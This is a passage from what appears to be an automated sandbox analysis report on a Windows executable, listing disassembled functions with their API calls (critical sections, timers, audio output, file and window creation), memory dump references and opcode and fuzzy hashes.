                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                                                                                                                                          Function 004F36F0 Relevance: 11.3, APIs: 9, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                                                                                                                                          Function 0079D940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079D977
                                                                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0079D97F
                                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079DA08
                                                                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0079DA33
                                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0079DA88
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                                                                                                                                          • Instruction ID: e60fa94935fac86d4f2411bee0f06bae9fa08a52f082d528d61211fb7b327bd8
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37b7ffcd75580574b2bed498a0d55029e147ec6556988c79b4e43bfdd644b3e9
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41D634A04208DFCF20DF68E885A9E7BB5FF45324F14C155E9196B392D739AD11CB91
                                                                                                                                                                                                                                                                                                                          Function 004D7D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID: localhost
                                                                                                                                                                                                                                                                                                                          • API String ID: 0-2663516195
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                                          • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                                                                                                                                          Function 004144DE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 324timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Timetime
                                                                                                                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                          • API String ID: 17336451-2178600047
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                                                                                                                                          • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36ada0748ce7ae867fc8d0b968c8e92e83edef51ded80e37bf17f681d92f4674
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                                                                                                                                          Function 004D8B00 Relevance: 9.1, APIs: 6, Instructions: 53sleepCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeKillEvent.WINMM(?,?,?,00000000,?,0041D4A9), ref: 004D8B13
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                                                                                                                                          • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                                                                                                                                          • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                                                                                                                                          • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3030913982-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                                                                                                                                          Function 004CF830 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                          • API String ID: 823142352-4282027825
                                                                                                                                                                                                                                                                                                                          • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                                                                                                                                          Function 004DD6F0 Relevance: 8.8, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,0015381C,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                                                                                                                                          Function 004D8640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$Create
                                                                                                                                                                                                                                                                                                                          • String ID: Dummy$STATIC
                                                                                                                                                                                                                                                                                                                          • API String ID: 1733017098-132613206
                                                                                                                                                                                                                                                                                                                          • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                                                                                                                                          Function 004F5A70 Relevance: 7.6, APIs: 6, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                                                                                                                                          Function 004F26C0 Relevance: 7.6, APIs: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
